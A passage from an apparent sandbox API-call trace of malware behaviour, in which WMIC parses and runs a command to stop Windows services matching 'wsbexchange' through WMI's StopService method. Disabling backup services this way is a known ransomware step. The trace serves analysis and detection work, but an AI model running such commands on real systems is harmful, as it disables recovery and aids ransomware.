_DestinationSize=0x4, _Source=0x34c2ee8, _SourceSize=0x4 | out: _Destination=0x34c0590) returned 0x0 [0311.985] free (_Block=0x34c2ee8) [0311.985] free (_Block=0x0) [0311.985] free (_Block=0x34c9da8) [0311.985] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.985] malloc (_Size=0xc) returned 0x34cac18 [0311.985] lstrlenW (lpString="where") returned 5 [0311.985] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0311.985] malloc (_Size=0xc) returned 0x34cad08 [0311.985] malloc (_Size=0xc) returned 0x34cab88 [0311.985] memmove_s (in: _Destination=0x34cab88, _DestinationSize=0x8, _Source=0x34c0590, _SourceSize=0x8 | out: _Destination=0x34cab88) returned 0x0 [0311.985] free (_Block=0x34c0590) [0311.985] free (_Block=0x0) [0311.985] free (_Block=0x34cac18) [0311.985] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.985] malloc (_Size=0x3c) returned 0x34cb198 [0311.985] lstrlenW (lpString="\"name like '%%wsbexchange%%'\"") returned 29 [0311.985] _wcsicmp (_String1="\"name like '%%wsbexchange%%'\"", _String2="\"NULL\"") returned -20 [0311.985] lstrlenW (lpString="\"name like '%%wsbexchange%%'\"") returned 29 [0311.985] lstrlenW (lpString="\"name like '%%wsbexchange%%'\"") returned 29 [0311.985] malloc (_Size=0x3c) returned 0x34cb1e0 [0311.985] malloc (_Size=0x10) returned 0x34cac18 [0311.985] memmove_s (in: _Destination=0x34cac18, _DestinationSize=0xc, _Source=0x34cab88, _SourceSize=0xc | out: _Destination=0x34cac18) returned 0x0 [0311.985] free (_Block=0x34cab88) [0311.985] free (_Block=0x0) [0311.986] free (_Block=0x34cb198) [0311.986] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.986] malloc (_Size=0xa) returned 0x34cab88 [0311.986] lstrlenW (lpString="call") returned 4 [0311.986] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0311.986] malloc (_Size=0xa) returned 0x34cac30 [0311.986] malloc (_Size=0x18) returned 0x34c2c20 [0311.986] memmove_s (in: _Destination=0x34c2c20, _DestinationSize=0x10, _Source=0x34cac18, _SourceSize=0x10 | out: _Destination=0x34c2c20) returned 0x0 [0311.986] free (_Block=0x34cac18) [0311.986] free (_Block=0x0) [0311.986] free (_Block=0x34cab88) [0311.986] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.986] malloc (_Size=0x18) returned 0x34c2b40 [0311.986] lstrlenW (lpString="stopservice") returned 11 [0311.986] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0311.986] malloc (_Size=0x18) returned 0x34c2ba0 [0311.986] free (_Block=0x0) [0311.986] free (_Block=0x34c2b40) [0311.986] malloc (_Size=0x18) returned 0x34c2b40 [0311.986] lstrlenW (lpString="QUIT") returned 4 [0311.986] lstrlenW (lpString="path") returned 4 [0311.986] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0311.986] lstrlenW (lpString="EXIT") returned 4 [0311.986] lstrlenW (lpString="path") returned 4 [0311.986] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0311.986] free (_Block=0x34c2b40) [0311.986] WbemLocator:IUnknown:AddRef (This=0x35b4ba8) returned 0x2 [0311.987] malloc (_Size=0x18) returned 0x34c2b40 [0311.987] lstrlenW (lpString="/") returned 1 [0311.987] lstrlenW (lpString="path") returned 4 [0311.987] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0311.987] lstrlenW (lpString="-") returned 1 [0311.987] lstrlenW (lpString="path") returned 4 [0311.987] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0311.987] lstrlenW (lpString="CLASS") returned 5 [0311.987] lstrlenW (lpString="path") returned 4 [0311.987] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0311.987] lstrlenW (lpString="PATH") returned 4 [0311.987] lstrlenW (lpString="path") returned 4 [0311.987] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0311.987] lstrlenW (lpString="/") returned 1 [0311.987] lstrlenW (lpString="Win32_Service") returned 13 [0311.987] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0311.987] lstrlenW (lpString="-") returned 1 [0311.987] lstrlenW (lpString="Win32_Service") returned 13 [0311.987] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0311.987] lstrlenW (lpString="Win32_Service") returned 13 [0311.987] malloc (_Size=0x1c) returned 0x34c9da8 [0311.987] lstrlenW (lpString="Win32_Service") returned 13 [0311.988] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x8d938ad5 | out: _String="Win32_Service", _Context=0x8d938ad5) returned="Win32_Service" [0311.988] lstrlenW (lpString="Win32_Service") returned 13 [0311.988] malloc (_Size=0x1c) returned 0x34cb198 [0311.988] lstrlenW (lpString="Win32_Service") returned 13 [0311.988] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x8d938ad5 | out: _String=0x0, _Context=0x8d938ad5) returned 0x0 [0311.988] lstrlenW (lpString="") returned 0 [0311.988] lstrlenW (lpString="WHERE") returned 5 [0311.988] lstrlenW (lpString="where") returned 5 [0311.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0311.988] lstrlenW (lpString="/") returned 1 [0311.988] lstrlenW (lpString="name like '%%wsbexchange%%'") returned 27 [0311.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%wsbexchange%%'", cchCount1=27, lpString2="/", cchCount2=1) returned 3 [0311.988] lstrlenW (lpString="-") returned 1 [0311.988] lstrlenW (lpString="name like '%%wsbexchange%%'") returned 27 [0311.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%wsbexchange%%'", cchCount1=27, lpString2="-", cchCount2=1) returned 3 [0311.988] lstrlenW (lpString="name like '%%wsbexchange%%'") returned 27 [0311.988] malloc (_Size=0x38) returned 0x34cb228 [0311.988] lstrlenW (lpString="name like '%%wsbexchange%%'") returned 27 [0311.988] lstrlenW (lpString="/") returned 1 [0311.988] lstrlenW (lpString="call") returned 4 [0311.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0311.988] lstrlenW (lpString="-") returned 1 [0311.988] lstrlenW (lpString="call") returned 4 [0311.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0311.989] lstrlenW (lpString="call") returned 4 [0311.989] malloc (_Size=0xa) returned 0x34cab88 [0311.989] lstrlenW (lpString="call") returned 4 [0311.989] lstrlenW (lpString="GET") returned 3 [0311.989] lstrlenW (lpString="call") returned 4 [0311.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0311.989] lstrlenW (lpString="LIST") returned 4 [0311.989] lstrlenW (lpString="call") returned 4 [0311.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0311.989] lstrlenW (lpString="SET") returned 3 [0311.989] lstrlenW (lpString="call") returned 4 [0311.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0311.989] lstrlenW (lpString="CREATE") returned 6 [0311.989] lstrlenW (lpString="call") returned 4 [0311.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0311.989] lstrlenW (lpString="CALL") returned 4 [0311.989] lstrlenW (lpString="call") returned 4 [0311.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0311.989] lstrlenW (lpString="/") returned 1 [0311.989] lstrlenW (lpString="stopservice") returned 11 [0311.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0311.989] lstrlenW (lpString="-") returned 1 [0311.989] lstrlenW (lpString="stopservice") returned 11 [0311.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0311.989] lstrlenW (lpString="stopservice") returned 11 [0311.989] malloc (_Size=0x18) returned 0x34c2d00 [0311.989] lstrlenW (lpString="stopservice") returned 11 [0311.989] ??0CHString@@QAE@XZ () returned 0x32bd9b4 [0311.990] GetCurrentThreadId () returned 0x1014 [0311.990] GetCurrentThreadId () returned 0x1014 [0311.990] ??0CHString@@QAE@XZ () returned 0x32bd93c [0311.990] malloc (_Size=0x4) returned 0x34c2ee8 [0311.990] malloc (_Size=0xc) returned 0x34cac18 [0311.990] malloc (_Size=0xc) returned 0x34caeb8 [0311.990] WbemLocator:IWbemLocator:ConnectServer (in: This=0x35b4ba8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x35baa18) returned 0x0 [0312.046] free (_Block=0x34caeb8) [0312.046] CoSetProxyBlanket (pProxy=0x35baa18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0312.046] free (_Block=0x34c2ee8) [0312.046] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0312.046] free (_Block=0x34cac18) [0312.046] malloc (_Size=0xc) returned 0x34cac18 [0312.047] IWbemServices:GetObject (in: This=0x35baa18, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x32bd9cc*=0x0, ppCallResult=0x0 | out: ppObject=0x32bd9cc*=0x36100f8, ppCallResult=0x0) returned 0x0 [0312.126] free (_Block=0x34cac18) [0312.126] IWbemClassObject:BeginMethodEnumeration (This=0x36100f8, lEnumFlags=0) returned 0x0 [0312.126] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="StartService", ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x36102f0) returned 0x0 [0312.126] lstrlenW (lpString="StartService") returned 12 [0312.126] lstrlenW (lpString="stopservice") returned 11 [0312.126] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0312.126] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.126] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="StopService", ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x36102f0) returned 0x0 [0312.126] lstrlenW (lpString="StopService") returned 11 [0312.126] lstrlenW (lpString="stopservice") returned 11 [0312.126] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0312.127] malloc (_Size=0x38) returned 0x34cb9d8 [0312.127] ??0CHString@@QAE@XZ () returned 0x32bd51c [0312.127] GetCurrentThreadId () returned 0x1014 [0312.127] IWbemClassObject:GetNames (in: This=0x36102f0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x32bd52c | out: pNames=0x32bd52c*="\x01ƀ\x04") returned 0x0 [0312.128] SafeArrayGetLBound (in: psa=0x3610648, nDim=0x1, plLbound=0x32bd518 | out: plLbound=0x32bd518) returned 0x0 [0312.128] SafeArrayGetUBound (in: psa=0x3610648, nDim=0x1, plUbound=0x32bd514 | out: plUbound=0x32bd514) returned 0x0 [0312.128] SafeArrayGetElement (in: psa=0x3610648, rgIndices=0x32bd520, pv=0x32bd530 | out: pv=0x32bd530) returned 0x0 [0312.128] malloc (_Size=0x24) returned 0x34cba18 [0312.128] IWbemClassObject:GetPropertyQualifierSet (in: This=0x36102f0, wszProperty="ReturnValue", ppQualSet=0x32bd440 | out: ppQualSet=0x32bd440*=0x35bab18) returned 0x0 [0312.129] malloc (_Size=0xc) returned 0x34cac18 [0312.129] IWbemQualifierSet:Get (in: This=0x35bab18, wszName="CIMTYPE", lFlags=0, pVal=0x32bd410*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x32bd410*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0312.129] free (_Block=0x34cac18) [0312.129] malloc (_Size=0xc) returned 0x34cac18 [0312.129] IWbemClassObject:Get (in: This=0x36102f0, wszName="ReturnValue", lFlags=0, pVal=0x32bd3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32bd424*=53203980, plFlavor=0x0 | out: pVal=0x32bd3e8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x32bd424*=19, plFlavor=0x0) returned 0x0 [0312.129] malloc (_Size=0xc) returned 0x34caea0 [0312.129] IWbemQualifierSet:Get (in: This=0x35bab18, wszName="read", lFlags=0, pVal=0x32bd428*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x32bd428*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0312.129] free (_Block=0x34caea0) [0312.129] malloc (_Size=0xc) returned 0x34cae88 [0312.130] IWbemQualifierSet:Get (in: This=0x35bab18, wszName="write", lFlags=0, pVal=0x32bd428*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x32bd428*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0312.130] free (_Block=0x34cae88) [0312.130] malloc (_Size=0xc) returned 0x34caea0 [0312.130] malloc (_Size=0xc) returned 0x34caeb8 [0312.130] IWbemQualifierSet:Get (in: This=0x35bab18, wszName="Description", lFlags=0, pVal=0x32bd400*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x32bd400*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0312.130] free (_Block=0x34caeb8) [0312.130] malloc (_Size=0xc) returned 0x34cae70 [0312.130] lstrlenA (lpString="Not Available") returned 13 [0312.130] malloc (_Size=0x1c) returned 0x34cba48 [0312.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x34cba48, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0312.130] free (_Block=0x34cba48) [0312.130] IUnknown:Release (This=0x35bab18) returned 0x0 [0312.130] malloc (_Size=0x24) returned 0x34cba48 [0312.130] malloc (_Size=0xc) returned 0x34caed0 [0312.130] malloc (_Size=0x24) returned 0x34cba78 [0312.130] malloc (_Size=0x38) returned 0x34cbaa8 [0312.130] malloc (_Size=0x24) returned 0x34cbae8 [0312.130] free (_Block=0x34cba78) [0312.130] free (_Block=0x34cba48) [0312.131] free (_Block=0x34cba18) [0312.131] free (_Block=0x34caea0) [0312.131] free (_Block=0x34cae70) [0312.131] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0312.131] IWbemClassObject:GetMethodQualifierSet (in: This=0x36100f8, wszMethod="StopService", ppQualSet=0x32bd934 | out: ppQualSet=0x32bd934*=0x35e4c20) returned 0x0 [0312.131] malloc (_Size=0xc) returned 0x34cae70 [0312.131] IWbemQualifierSet:Get (in: This=0x35e4c20, wszName="Implemented", lFlags=0, pVal=0x32bd91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x32bd91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0312.131] free (_Block=0x34cae70) [0312.131] malloc (_Size=0xc) returned 0x34cae58 [0312.131] malloc (_Size=0xc) returned 0x34cae10 [0312.131] IWbemQualifierSet:Get (in: This=0x35e4c20, wszName="Description", lFlags=0, pVal=0x32bd90c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x32bd90c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0312.132] free (_Block=0x34cae10) [0312.132] malloc (_Size=0xc) returned 0x34cae10 [0312.132] IUnknown:Release (This=0x35e4c20) returned 0x0 [0312.132] malloc (_Size=0x38) returned 0x34cba18 [0312.132] malloc (_Size=0x38) returned 0x34cba58 [0312.132] malloc (_Size=0x24) returned 0x34cbb18 [0312.132] malloc (_Size=0xc) returned 0x34cae70 [0312.133] malloc (_Size=0x38) returned 0x34cbb48 [0312.133] malloc (_Size=0x38) returned 0x34cbb88 [0312.133] malloc (_Size=0x24) returned 0x34cbbc8 [0312.133] malloc (_Size=0x28) returned 0x34cbbf8 [0312.133] malloc (_Size=0x38) returned 0x34cbc28 [0312.133] malloc (_Size=0x38) returned 0x34cbc68 [0312.133] malloc (_Size=0x24) returned 0x34cbca8 [0312.133] free (_Block=0x34cbbc8) [0312.133] free (_Block=0x34cbb88) [0312.133] free (_Block=0x34cbb48) [0312.133] free (_Block=0x34cbb18) [0312.133] free (_Block=0x34cba58) [0312.133] free (_Block=0x34cba18) [0312.133] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.133] free (_Block=0x34cbae8) [0312.133] free (_Block=0x34cbaa8) [0312.133] free (_Block=0x34cb9d8) [0312.133] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="PauseService", ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x35e69f8) returned 0x0 [0312.133] lstrlenW (lpString="PauseService") returned 12 [0312.133] lstrlenW (lpString="stopservice") returned 11 [0312.133] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0312.134] IUnknown:Release (This=0x35e69f8) returned 0x0 [0312.134] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="ResumeService", ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x35e69f8) returned 0x0 [0312.134] lstrlenW (lpString="ResumeService") returned 13 [0312.134] lstrlenW (lpString="stopservice") returned 11 [0312.134] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0312.134] IUnknown:Release (This=0x35e69f8) returned 0x0 [0312.134] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="InterrogateService", ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x35e69f8) returned 0x0 [0312.134] lstrlenW (lpString="InterrogateService") returned 18 [0312.134] lstrlenW (lpString="stopservice") returned 11 [0312.134] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0312.134] IUnknown:Release (This=0x35e69f8) returned 0x0 [0312.134] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="UserControlService", ppInSignature=0x32bd9d4*=0x36102f0, ppOutSignature=0x32bd9d0*=0x3612da8) returned 0x0 [0312.134] lstrlenW (lpString="UserControlService") returned 18 [0312.134] lstrlenW (lpString="stopservice") returned 11 [0312.134] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0312.134] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.135] IUnknown:Release (This=0x3612da8) returned 0x0 [0312.135] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="Create", ppInSignature=0x32bd9d4*=0x36102f0, ppOutSignature=0x32bd9d0*=0x3614d78) returned 0x0 [0312.135] lstrlenW (lpString="Create") returned 6 [0312.135] lstrlenW (lpString="stopservice") returned 11 [0312.135] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0312.135] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.136] IUnknown:Release (This=0x3614d78) returned 0x0 [0312.136] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="Change", ppInSignature=0x32bd9d4*=0x36102f0, ppOutSignature=0x32bd9d0*=0x3614af8) returned 0x0 [0312.136] lstrlenW (lpString="Change") returned 6 [0312.136] lstrlenW (lpString="stopservice") returned 11 [0312.136] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0312.136] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.136] IUnknown:Release (This=0x3614af8) returned 0x0 [0312.136] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="ChangeStartMode", ppInSignature=0x32bd9d4*=0x36102f0, ppOutSignature=0x32bd9d0*=0x3612da8) returned 0x0 [0312.136] lstrlenW (lpString="ChangeStartMode") returned 15 [0312.136] lstrlenW (lpString="stopservice") returned 11 [0312.136] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0312.136] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.136] IUnknown:Release (This=0x3612da8) returned 0x0 [0312.136] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="Delete", ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x35e69f8) returned 0x0 [0312.137] lstrlenW (lpString="Delete") returned 6 [0312.137] lstrlenW (lpString="stopservice") returned 11 [0312.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0312.137] IUnknown:Release (This=0x35e69f8) returned 0x0 [0312.137] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="GetSecurityDescriptor", ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x36102f0) returned 0x0 [0312.137] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0312.137] lstrlenW (lpString="stopservice") returned 11 [0312.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0312.137] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.137] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*="SetSecurityDescriptor", ppInSignature=0x32bd9d4*=0x36102f0, ppOutSignature=0x32bd9d0*=0x3612da8) returned 0x0 [0312.137] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0312.137] lstrlenW (lpString="stopservice") returned 11 [0312.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0312.138] IUnknown:Release (This=0x36102f0) returned 0x0 [0312.138] IUnknown:Release (This=0x3612da8) returned 0x0 [0312.138] IWbemClassObject:NextMethod (in: This=0x36100f8, lFlags=0, pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0 | out: pstrName=0x32bd9d8*=0x0, ppInSignature=0x32bd9d4*=0x0, ppOutSignature=0x32bd9d0*=0x0) returned 0x40005 [0312.138] IUnknown:Release (This=0x36100f8) returned 0x0 [0312.138] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0312.138] lstrlenW (lpString="SET") returned 3 [0312.138] lstrlenW (lpString="call") returned 4 [0312.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0312.138] lstrlenW (lpString="CREATE") returned 6 [0312.138] lstrlenW (lpString="call") returned 4 [0312.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0312.138] free (_Block=0x34c2b40) [0312.138] malloc (_Size=0x4) returned 0x34c2ee8 [0312.138] lstrlenW (lpString="GET") returned 3 [0312.138] lstrlenW (lpString="call") returned 4 [0312.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0312.139] lstrlenW (lpString="LIST") returned 4 [0312.139] lstrlenW (lpString="call") returned 4 [0312.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0312.139] lstrlenW (lpString="ASSOC") returned 5 [0312.139] lstrlenW (lpString="call") returned 4 [0312.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0312.139] WbemLocator:IUnknown:AddRef (This=0x35b4ba8) returned 0x3 [0312.139] free (_Block=0x34c2788) [0312.139] lstrlenW (lpString="") returned 0 [0312.139] lstrlenW (lpString="NQDPDE") returned 6 [0312.139] CompareStringW 